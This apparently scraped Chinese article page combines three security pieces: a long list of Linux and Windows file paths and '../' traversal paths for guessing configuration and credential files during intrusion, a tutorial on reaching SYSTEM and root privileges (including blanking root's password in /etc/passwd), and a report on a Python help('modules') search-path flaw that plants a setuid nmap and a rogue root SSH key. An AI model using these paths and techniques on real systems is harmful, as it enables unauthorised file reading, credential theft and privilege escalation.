入侵提权过程中猜解linux路径与windows路径

| 收藏本文 下载本文 作者:安妮

以下是小编帮大家整理的入侵提权过程中猜解linux路径与windows路径(共含3篇),欢迎大家分享。同时,但愿您也能像本文投稿人“安妮”一样,积极向本站投稿分享好文章。

入侵提权过程中猜解linux路径与windows路径

篇1:入侵提权过程中猜解linux路径与windows路径

/usr/local/Zend/etc/php.ini

1.LINUX常见路径:

/etc/passwd

/etc/shadow

/etc/fstab

/etc/host.conf

/etc/motd

/etc/ld.so.conf

/var/www/htdocs/index.php

/var/www/conf/httpd.conf

/var/www/htdocs/

/var/httpd/conf/php.ini

/var/httpd/htdocs/index.php

/var/httpd/conf/httpd.conf

/var/httpd/htdocs/

/var/httpd/conf/php.ini

/var/www/

/var/www/index.php

/opt/www/conf/httpd.conf

/opt/www/htdocs/index.php

/opt/www/htdocs/

/usr/local/apache/htdocs/

/usr/local/apache/htdocs/index.php

/usr/local/apache2/htdocs/

/usr/local/apache2/htdocs/index.php

/usr/local/httpd2.2/htdocs/index.php

/usr/local/httpd2.2/htdocs/

/tmp/apache/htdocs/

/tmp/apache/htdocs/index.php

/etc/httpd/htdocs/index.php

/etc/httpd/conf/httpd.conf

/etc/httpd/htdocs/

/www/php/php.ini

/www/php4/php.ini

/www/php5/php.ini

/www/conf/httpd.conf

/www/htdocs/index.php

/www/htdocs/

/usr/local/httpd/conf/httpd.conf

/apache/apache/conf/httpd.conf

/apache/apache2/conf/httpd.conf

/etc/apache/apache.conf

/etc/apache2/apache.conf

/etc/apache/httpd.conf

/etc/apache2/httpd.conf

/etc/apache2/vhosts.d/00_default_vhost.conf

/etc/apache2/sites-available/default

/etc/phpmyadmin/config.inc.php

/etc/mysql/my.cnf

/etc/httpd/conf.d/php.conf

/etc/httpd/conf.d/httpd.conf

/etc/httpd/logs/error_log

/etc/httpd/logs/error.log

/etc/httpd/logs/access_log

/etc/httpd/logs/access.log

/home/apache/conf/httpd.conf

/home/apache2/conf/httpd.conf

/var/log/apache/error_log

/var/log/apache/error.log

/var/log/apache/access_log

/var/log/apache/access.log

/var/log/apache2/error_log

/var/log/apache2/error.log

/var/log/apache2/access_log

/var/log/apache2/access.log

/var/www/logs/error_log

/var/www/logs/error.log

/var/www/logs/access_log

/var/www/logs/access.log

/usr/local/apache/logs/error_log

/usr/local/apache/logs/error.log

/usr/local/apache/logs/access_log

/usr/local/apache/logs/access.log

/var/log/error_log

/var/log/error.log

/var/log/access_log

/var/log/access.log

/usr/local/apache/logs/access_logaccess_log.old

/usr/local/apache/logs/error_logerror_log.old

/etc/php.ini

/bin/php.ini

/etc/init.d/httpd

/etc/init.d/mysql

/etc/httpd/php.ini

/usr/lib/php.ini

/usr/lib/php/php.ini

/usr/local/etc/php.ini

/usr/local/lib/php.ini

/usr/local/php/lib/php.ini

/usr/local/php4/lib/php.ini

/usr/local/php4/php.ini

/usr/local/php4/lib/php.ini

/usr/local/php5/lib/php.ini

/usr/local/php5/etc/php.ini

/usr/local/php5/php5.ini

/usr/local/apache/conf/php.ini

/usr/local/apache/conf/httpd.conf

/usr/local/apache2/conf/httpd.conf

/usr/local/apache2/conf/php.ini

/etc/php4.4/fcgi/php.ini

/etc/php4/apache/php.ini

/etc/php4/apache2/php.ini

/etc/php5/apache/php.ini

/etc/php5/apache2/php.ini

/etc/php/php.ini

/etc/php/php4/php.ini

/etc/php/apache/php.ini

/etc/php/apache2/php.ini

/web/conf/php.ini

/usr/local/Zend/etc/php.ini

/opt/xampp/etc/php.ini

/var/local/www/conf/php.ini

/var/local/www/conf/httpd.conf

/etc/php/cgi/php.ini

/etc/php4/cgi/php.ini

/etc/php5/cgi/php.ini

/php5/php.ini

/php4/php.ini

/php/php.ini

/PHP/php.ini

/apache/php/php.ini

/xampp/apache/bin/php.ini

/xampp/apache/conf/httpd.conf

/NetServer/bin/stable/apache/php.ini

/home2/bin/stable/apache/php.ini

/home/bin/stable/apache/php.ini

/var/log/mysql/mysql-bin.log

/var/log/mysql.log

/var/log/mysqlderror.log

/var/log/mysql/mysql.log

/var/log/mysql/mysql-slow.log

/var/mysql.log

/var/lib/mysql/my.cnf

/usr/local/mysql/my.cnf

/usr/local/mysql/bin/mysql

/etc/mysql/my.cnf

/etc/my.cnf

/usr/local/cpanel/logs

/usr/local/cpanel/logs/stats_log

/usr/local/cpanel/logs/access_log

/usr/local/cpanel/logs/error_log

/usr/local/cpanel/logs/license_log

/usr/local/cpanel/logs/login_log

/usr/local/cpanel/logs/stats_log

/usr/local/share/examples/php4/php.ini

/usr/local/share/examples/php/php.ini

2..windows常见路径(可以将c盘换成d,e盘,比如星外虚拟主机跟华众得,一般都放在d盘)

c:windowsphp.ini

c:boot.ini

c:1.txt

c:a.txt

c:CMailServerconfig.ini

c:CMailServerCMailServer.exe

c:CMailServerWebMailindex.asp

c:program filesCMailServerCMailServer.exe

c:program filesCMailServerWebMailindex.asp

C:WinWebMailSysInfo.ini

C:WinWebMailWebdefault.asp

C:WINDOWSFreeHost32.dll

C:WINDOWS7i24iislog4.exe

C:WINDOWS7i24tool.exe

c:hzhostdatabasesurl.asp

c:hzhosthzclient.exe

C:Documents and SettingsAll Users「开始」菜单程序7i24虚拟主机管理平台自动设置[受控端].lnk

C:Documents and SettingsAll Users「开始」菜单程序Serv-UServ-U Administrator.lnk

C:WINDOWSweb.config

c:webindex.html

c:wwwindex.html

c:WWWROOTindex.html

c:websiteindex.html

c:webindex.asp

c:wwwindex.asp

c:wwwsiteindex.asp

c:WWWROOTindex.asp

c:webindex.php

c:wwwindex.php

c:WWWROOTindex.php

c:WWWsiteindex.php

c:webdefault.html

c:wwwdefault.html

c:WWWROOTdefault.html

c:websitedefault.html

c:webdefault.asp

c:wwwdefault.asp

c:wwwsitedefault.asp

c:WWWROOTdefault.asp

c:webdefault.php

c:wwwdefault.php

c:WWWROOTdefault.php

c:WWWsitedefault.php

C:Inetpubwwwrootpagerror.gif

c:windowsnotepad.exe

c:winntnotepad.exe

C:Program FilesMicrosoft OfficeOFFICE10winword.exe

C:Program FilesMicrosoft OfficeOFFICE11winword.exe

C:Program FilesMicrosoft OfficeOFFICE12winword.exe

C:Program FilesInternet ExplorerIEXPLORE.EXE

C:Program Fileswinrarrar.exe

C:Program Files360360Safe360safe.exe

C:Program Files360Safe360safe.exe

C:Documents and SettingsAdministratorApplication Data360Safe360Examine360Examine.log

c:ravbinstore.ini

c:rising.ini

C:Program FilesRisingRavRsTask.xml

C:Documents and SettingsAll UsersStart Menudesktop.ini

C:Documents and SettingsAdministratorMy DocumentsDefault.rdp

C:Documents and SettingsAdministratorCookiesindex.dat

C:Documents and SettingsAdministratorMy Documents新建 文本文档.txt

C:Documents and SettingsAdministrator桌面新建 文本文档.txt

C:Documents and SettingsAdministratorMy Documents1.txt

C:Documents and SettingsAdministrator桌面1.txt

C:Documents and SettingsAdministratorMy Documentsa.txt

C:Documents and SettingsAdministrator桌面a.txt

C:Documents and SettingsAll UsersDocumentsMy PicturesSample PicturesBlue hills.jpg

E:Inetpubwwwrootaspnet_clientsystem_web1_1_4322SmartNav.htm

C:Program FilesRhinoSoft.comServ-UVersion.txt

C:Program FilesRhinoSoft.comServ-UServUDaemon.ini

C:Program FilesSymantecSYMEVENT.INF

C:Program FilesMicrosoft SQL Server80ToolsBinnsqlmangr.exe

C:Program FilesMicrosoft SQL ServerMSSQLDatamaster.mdf

C:Program FilesMicrosoft SQL ServerMSSQL.1MSSQLDatamaster.mdf

C:Program FilesMicrosoft SQL ServerMSSQL.2MSSQLDatamaster.mdf

C:Program FilesMicrosoft SQL Server80ToolsHTMLdatabase.htm

C:Program FilesMicrosoft SQL ServerMSSQLREADME.TXT

C:Program FilesMicrosoft SQL Server90ToolsBinDdsShapes.dll

C:Program FilesMicrosoft SQL ServerMSSQLsqlsunin.ini

C:MySQLMySQL Server 5.0my.ini

C:Program FilesMySQLMySQL Server 5.0my.ini

C:Program FilesMySQLMySQL Server 5.0datamysqluser.frm

C:Program FilesMySQLMySQL Server 5.0COPYING

C:Program FilesMySQLMySQL Server 5.0sharemysql_fix_privilege_tables.sql

C:Program FilesMySQLMySQL Server 4.1binmysql.exe

c:MySQLMySQL Server 4.1binmysql.exe

c:MySQLMySQL Server 4.1datamysqluser.frm

C:Program FilesOracleoraconfigLpk.dll

C:WINDOWSMicrosoft.NETFrameworkv2.0.50727aspnet_state.exe

C:WINDOWSsystem32inetsrvw3wp.exe

C:WINDOWSsystem32inetsrvinetinfo.exe

C:WINDOWSsystem32inetsrvMetaBase.xml

C:WINDOWSsystem32inetsrviisadmpwdachg.asp

C:WINDOWSsystem32configdefault.LOG

C:WINDOWSsystem32configsam

C:WINDOWSsystem32configsystem

c:CMailServerconfig.ini

c:program filesCMailServerconfig.ini

c:tomcat6tomcat6binversion.sh

c:tomcat6binversion.sh

c:tomcatbinversion.sh

c:program filestomcat6binversion.sh

C:Program FilesApache Software FoundationTomcat 6.0binversion.sh

c:Program FilesApache Software FoundationTomcat 6.0logsisapi_redirect.log

c:Apache2Apache2binApache.exe

c:Apache2binApache.exe

c:Apache2phplicense.txt

C:Program FilesApache GroupApache2binApache.exe

/usr/local/tomcat5527/bin/version.sh

/usr/share/tomcat6/bin/startup.sh

/usr/tomcat6/bin/startup.sh

c:Program FilesQQqq.exe

c:Program FilesTencentqqUser.db

c:Program FilesTencentqqqq.exe

c:Program FilesTencentqqbinqq.exe

c:Program FilesTencentqqqq.exe

c:Program FilesTencentqqqq.exe

c:Program FilesTencentqqbinqq.exe

c:Program FilesTencentqqUsersAll UsersRegistry.db

C:Program FilesTencentTMTMDllsQQZip.dll

c:Program FilesTencentTmBinTxplatform.exe

c:Program FilesTencentRTXServerAppConfig.xml

C:Program FilesFoxmalFoxmail.exe

C:Program FilesFoxmalaccounts.cfg

C:Program FilestencentFoxmalFoxmail.exe

C:Program FilestencentFoxmalaccounts.cfg

C:Program FilesLeapFTP 3.0LeapFTP.exe

C:Program FilesLeapFTPLeapFTP.exe

c:Program FilesGlobalSCAPECuteFTP Procftppro.exe

c:Program FilesGlobalSCAPECuteFTP Pronotes.txt

C:Program FilesFlashFXPFlashFXP.ini

C:Program FilesFlashFXPflashfxp.exe

c:Program FilesOraclebinregsvr32.exe

c:Program Files腾讯游戏QQGAMEreadme.txt

c:Program Filestencent腾讯游戏QQGAMEreadme.txt

c:Program FilestencentQQGAMEreadme.txt

C:Program FilesStormIIStorm.exe

3.网站相对路径:

/config.php

../../config.php

../config.php

../../../config.php

/config.inc.php

./config.inc.php

../../config.inc.php

../config.inc.php

../../../config.inc.php

/conn.php

./conn.php

../../conn.php

../conn.php

../../../conn.php

/conn.asp

./conn.asp

../../conn.asp

../conn.asp

../../../conn.asp

/config.inc.php

./config.inc.php

../../config.inc.php

../config.inc.php

../../../config.inc.php

/config/config.php

../../config/config.php

../config/config.php

../../../config/config.php

/config/config.inc.php

./config/config.inc.php

../../config/config.inc.php

../config/config.inc.php

../../../config/config.inc.php

/config/conn.php

./config/conn.php

../../config/conn.php

../config/conn.php

../../../config/conn.php

/config/conn.asp

./config/conn.asp

../../config/conn.asp

../config/conn.asp

../../../config/conn.asp

/config/config.inc.php

./config/config.inc.php

../../config/config.inc.php

../config/config.inc.php

../../../config/config.inc.php

/data/config.php

../../data/config.php

../data/config.php

../../../data/config.php

/data/config.inc.php

./data/config.inc.php

../../data/config.inc.php

../data/config.inc.php

../../../data/config.inc.php

/data/conn.php

./data/conn.php

../../data/conn.php

../data/conn.php

../../../data/conn.php

/data/conn.asp

./data/conn.asp

../../data/conn.asp

../data/conn.asp

../../../data/conn.asp

/data/config.inc.php

./data/config.inc.php

../../data/config.inc.php

../data/config.inc.php

../../../data/config.inc.php

/include/config.php

../../include/config.php

../include/config.php

../../../include/config.php

/include/config.inc.php

./include/config.inc.php

../../include/config.inc.php

../include/config.inc.php

../../../include/config.inc.php

/include/conn.php

./include/conn.php

../../include/conn.php

../include/conn.php

../../../include/conn.php

/include/conn.asp

./include/conn.asp

../../include/conn.asp

../include/conn.asp

../../../include/conn.asp

/include/config.inc.php

./include/config.inc.php

../../include/config.inc.php

../include/config.inc.php

../../../include/config.inc.php

/inc/config.php

../../inc/config.php

../inc/config.php

../../../inc/config.php

/inc/config.inc.php

./inc/config.inc.php

../../inc/config.inc.php

../inc/config.inc.php

../../../inc/config.inc.php

/inc/conn.php

./inc/conn.php

../../inc/conn.php

../inc/conn.php

../../../inc/conn.php

/inc/conn.asp

./inc/conn.asp

../../inc/conn.asp

../inc/conn.asp

../../../inc/conn.asp

/inc/config.inc.php

./inc/config.inc.php

../../inc/config.inc.php

../inc/config.inc.php

../../../inc/config.inc.php

/index.php

./index.php

../../index.php

../index.php

../../../index.php

/index.asp

./index.asp

../../index.asp

../index.asp

../../../index.asp

篇2:Windows与Linux本地用户提权体验网站安全

作者:甘肃老五

无论是Windows系统还是Linux系统都是基于权限控制的,其严格的用户等级和权限是系统安全的有力保证,这么严密的用户权限是否不可逾越呢?下面笔者反其道而行之进行Windows及Linux下的提权测试。

一、windows下获取至高权限

大家知道,在Windows系统中SYSTEM是至高无上的超级管理员帐户。默认情况下,我们无法直接在登录对话框上以SYSTEM帐户的身份登录到Windows桌面环境。实际上SYSTEM帐户早就已经“盘踞”在系统中了。想想也是,连负责用户验证的Winlogon、Lsass等进程都是以SYSTEM身份运行的,谁还能有资格检验SYSTEM呢?既然SYSTEM帐户早就已经出现在系统中,所以只需以SYSTEM帐户的身份启动Windows的Shell程序Explorer,就相当于用SYSTEM身份登录Windows了。

1、获得特权

打开命令提示符,输入命令“taskkill /f /im explorer.exe” 并回车,这个命令是结束当前账户explorer即图形用户界面的Shell。然后在命令提示符下继续输入“at time /interactive %systemroot%explorer.exe”并回车。其中“time”为当前系统时间稍后的一个时间,比如间隔一秒,当前系统时间可以在命令提示符下输入“time”命令获得。一秒钟后会重新加载用户配置,以SYSTEM身份启动Windows的shell进程Explorer.exe。(图1)

2、身份验证

如何知道exeplorer.exe是以system权限运行呢?我通过“开始”菜单可以看到最上面显示的是system账户。另外,打开注册表编辑器,只要证明HKCU就是HKUS-1-5-18的链接就可以了(S-1-5-18就是SYSTEM帐户的SID)。证明方法很简单:在HKCU下随便新建一个Test子项,然后刷新,再看看HKUS-1-5-18下是否同步出现了Test子项,如果是,就说明系统当前加载的就是SYSTEM帐户的用户配置单元。当然最简单的是在命令提示符号下输入命令“whoami”进行验证,如图所示显示为“NT AUTHORITYSYSTEM”这就证明当前exeplorer.exe是System权限。(图2)

3、大行其道

System权限的Explorer.exe在实际中有什么用呢?下面笔者随意列举几个使用实例。

(1).注册表访问

我们知道在非SYSTEM权限下,用户是没有权限访问某些注册表项的,比如“HKEY_LOCAL_MACHINESAM”、“HKEY_LOCAL_MACHINESECURITY”等。这些项记录的是系统的核心数据,某些病毒或者木马会光顾这里。比如在SAM项目下建立具有管理员权限的隐藏账户,这样的帐户在命令及“本地用户和组”管理器(lusrmgr.msc)中是无法看到的,造成了很大的安全隐患。在“SYSTEM”权限下,注册表的访问就没有任何障碍,我们打开注册表定位到“HKEY_LOCAL_MACHINESAMSAMDomainsAccount”项下所有的隐藏帐户就都暴露了。(图3)

(2).访问系统还原文件

系统还原是windows系统的一种自我保护措施,它在每个磁盘根目录下建立“System Colume Information”文件夹,保存一些系统信息以备系统恢复是使用。该文件具有系统、隐藏属性管理员用户是没有操作权限的。正因为如此,它成了病毒、木马的栖身之地,我们就可以在System权限下进入该文件夹删除病毒。当然,你也可以关闭“系统还原”预防此类病毒,但这样未免显得被动,有些因噎废食。(图4)

(3).更换系统文件

Windows系统为系统文件做了保护机制,一般情况下你是不可能更换系统文件的,因为系统中都有系统文件的备份,它存在于c:WINDOWSsystem32dllcache(假设你的系统装在C盘)。当你更换了系统文件后,系统自动就会从这个目录中恢复相应的系统文件。当目录中没有相应的系统文件的时候会弹出提示让你插入安装盘。

在实际应用中如果有时你需要Diy自己的系统修改一些系统文件,或者用高版本的系统文件更换低版本的系统文件,让系统功能提升。比如Window XP系统只支持一个用户远程登录,如果你要让它支持多用户的远程登录。要用Windows 的远程登录文件替换Window XP的相应文件。这在非SYSTEM权限下很难实现,但是在SYSTEM权限下就可以很容易实现。

从Windows 2003的系统中提取termsrv.dll文件,用该文件替换Windows XP的C:WINDOWSsystem32下的同名文件。(对于Windows XP SP2还必须替换C:WINDOWS$NtServicePackUninstall$和C:WINDOWSServicePackFilesi386目录下的同名文件)。再进行相应的系统设置即可让Windows XP支持多用户远程登录。

(4).手工杀毒

用户在使用电脑的过程中一般都是用Administrator或者其它的管理员用户登录的,中毒或者中马后,病毒、木马大都是以管理员权限运行的,

我们在系统中毒后一般都是用杀毒软件来杀毒,如果杀软瘫痪了,或者杀毒软件只能查出来,但无法清除,这时候就只能赤膊上阵,手工杀毒了。

在Adinistrator权限下,如果手工查杀对于有些病毒无能为力,一般要启动到安全模式下,有时就算到了安全模式下也无法清除干净。如果以SYSTEM权限登录,查杀病毒就容易得多。

以一次手工杀毒为例,(为了截图在虚拟机上模拟了前段时间的一次手工杀毒。)打“Windows 任务管理器”,发现有个可疑进程“86a01.exe”,在Administrator管理员下无法结束进程见图5,当然更无法删除在系统目录下的病毒原文件“86a01.exe”。以System权限登录系统,进程被顺利结束见图6,然后删除病毒原文件,清除注册表中的相关选项,病毒被彻底清理出系统。(图5)(图6)

System权限是比Administrator权限还高的系统最高权限,利用它可以完成很多常规情况下无法完成的任务。当然,最大的权限也就意味着更大的危险,不要因为手握“尚方宝剑”就滥杀无辜。

二、Linux下授权测试

类似于Windows系统Linux系统中用户是具有权限属性的,甚至它的权限设置更为严格。我们知道在Linux系统中root是管理员用户拥有最高的权限,除此之外的其他用户是普通用户其权限都是受限的。如何让普通用户也具有root权限当管理员使用呢?下面笔者搭建环境,以重启网络操作为例进行Root授权演示。

环境说明:

OS:Fedora Core 6 (域名:ns.linux.com.cn)

Tools:PuTTY(SSH/Telnet远程登录)

1、登录系统

运行PuTTY,首先以Root用户远程登录系统,输入用户名、密码成功登入系统。然后以普通用户hacker远程登录输入用户名、密码进入系统。

2、权限测试

在Root用户登录窗口中我们输入命令“/etc/init.d/network restart”重启网络服务,如图7所示启动成功。然后在hacker用户登录窗口输入同样的命令重启网络,显示失败,可以普通用户hacker是没有执行该命令的权限的。(图7)

3、Root授权

要使得普通用户hacker也具有重启网络的权限,我们需要修改/etc/sudoers文件。输入命令“ls -l /etc/sudoers”查看root用户默认对该文件只有“读”权限,是没有办法修改的。对此,我们可以修改其权限让Root用户可以修改,也可以用vi打开该文件修改然后强行保存退出,当然最方便的是用“visudo”命令进行编辑。

定位到“# User privilege specification”下,按照格式“username host username command”进行输入。其中第一个字段是用户名(被授权用户),第二个自动是主机位(用域名、IP地址都可以),第三个字段是用户名(授权用户),第四个字段是命令(授权用户可以执行的命令,可以用别名)。结合实例我们添加如下字段:hacker All = (root) /etc/init.d/network 即授权hacker用户以Root权限运行/etc/init.d/network,最后保存退出。(图8)

4、权限测试

在hacker用户窗口中输入命令:sudo /etc/init.d/network restart,看hacker是否可以重启网络,如图9所示命令成功执行网络被重启,说明授权成功。这里必须要说明的是必须以“sudo”来运行命令,因为sudo命令会调用“/etc/sudoers”脚本,刚才的授权才会生效。另外,在命令执行前要输入密码,这个密码是当前用户即hacker的密码。(图9)

5、延伸

我们通过修改/etc/sudoers文件可以灵活地进行用户赋权,赋予不同的用户执行特殊命令的权限。/etc/sudoers文件中添加的信息,其中用户、命令都可以用别名,被授权用户可以是多个,命令可以是多条。我们通过修改该文件进行用户授权是一定要慎重,防止授权过大造成系统安全隐患。比如我们在该文件中添加这样的字段angel ALL = (ALL) ALL,这样的话angel用户就具有了系统的所有权限,就相当于另一个Root用户。下面我们操作测试一下。(图10)

新建test用户并设置密码,然后从在hacker登录窗口中通过命令su -angel 切换到angel用户,看看权限过大会产生什么后果。大家知道/etc/passwd是保存用户密码的文件,我们输入sudo vi /etc/passwd用sudo命令调用vi打开该文件,定位到root行,可以看到有个“x”号表示root用户设置了密码,我们删除“x”字段最后保存退出。输入命令more /etc/passwd | grep root查看“x”被成功删除,root用户就是空密码了。在angel窗口输入命令sudo root可以看到空密码可以进入到Root登录窗口。(图11)

总结:本文关于Windows、Linux本地用户提权测试,只是从技术上提供一个思路,至于提权以后可以用来干什么还需要我们大家深入挖掘。

篇3:python提权:pythonwrapper及python 不可信的搜索路径/代码执行漏洞

exploit-db.com近日爆了一个奇特的漏洞,只要诱使root在当前目录,通过python或者python-wrapper执行一下help(‘modules’)命令,后台就以root权限执行该目录下test.py脚本。

///adalia是普通用户,以下显示test.py的权限和脚本内容。脚本内容其中一项是chmod 4755 /usr/bin/nmap,把nmap加为4755权限,这意味着以执行nmap时以nmap的owner权限执行,即普通用户可以用root权限执行nmap

///以下所示nmap本来的权限为rwx,

adalia@bukkit:~/security/pythonwrapper> ls -hl /usr/bin/nmap

-rwxr-xr-x 1 root root 1.4M Oct 29 2011 /usr/bin/nmap

///攻击前/root/.ssh/authorized_keys不存在

bukkit:/home/adalia/security/pythonwrapper # ls /root/.ssh/authorized_keys

ls: cannot access /root/.ssh/authorized_keys: No such file or directory

///攻击开始:以bukkit(root权限)执行python

adalia@bukkit:~/security/pythonwrapper> su

Password:

bukkit:/home/adalia/security/pythonwrapper # python

Python 2.7.2 (default, Aug 19 2011, 20:41:43) [GCC] on linux2

Type “help”, “copyright”, “credits” or “license” for more information.

>>> help('modules')

Please wait a moment while I gather a list of all available modules...

...此处省略具体模块...

>>> exit()

///经过一番modules的列举后在看看情况nmap的权限已经变成rws了,

也即可以以nmap的owen权限执行。而原本不存在的/root/.ssh/authorized_keys的文件也有了。

bukkit:/home/adalia/security/pythonwrapper # ls -hl /usr/bin/nmap

-rwsr-xr-x 1 root root 1.4M Oct 29 2011 /usr/bin/nmap

bukkit:/home/adalia/security/pythonwrapper # cat /root/.ssh/authorized_keys

ssh-rsa rogueclown washere

漏洞发现者还提供了一种诱使管理员运行help(‘modules’)的场景,在webhosting环境下,向管理员反应某些模块运行有问题,要求管理帮忙调试一把,列出webhosting环境里安装了那些模块。于是管理员等到该用户目录下,一跑起help(‘modules’)就悲剧了。

受影响:

Version: python 2.7.2 and python 3.2.1

Python untrusted search path/code execution vulnerability:

www.exploit-id.com/local-exploits/python-untrusted-search-pathcode-execution-vulnerability

python-wrapper untrusted search path/code execution vulnerability:

www.exploit-db.com/exploits/19523/

摘自: FreebuF.COM

二人转演唱现状与化解路径论文

教师成长策略与路径的心得体会

大学生思想教育与思想政治教育路径的论文

探究我国建筑工程管理中的理由与路径

大学体育教学改革的现状与效果提升路径论文

四川某市房管局网站服务器内部网络入侵纪实反弹Shell,Linux溢出提权。

高职院校实训教学的路径依赖与路径调整教育论文

入侵提权过程中猜解linux路径与windows路径(共3篇)

欢迎下载DOC格式的入侵提权过程中猜解linux路径与windows路径,但愿能给您带来参考作用!
推荐度: 推荐 推荐 推荐 推荐 推荐
点击下载文档 文档为doc格式

相关文章

热门推荐

HOT

猜你喜欢

NEW
点击下载本文文档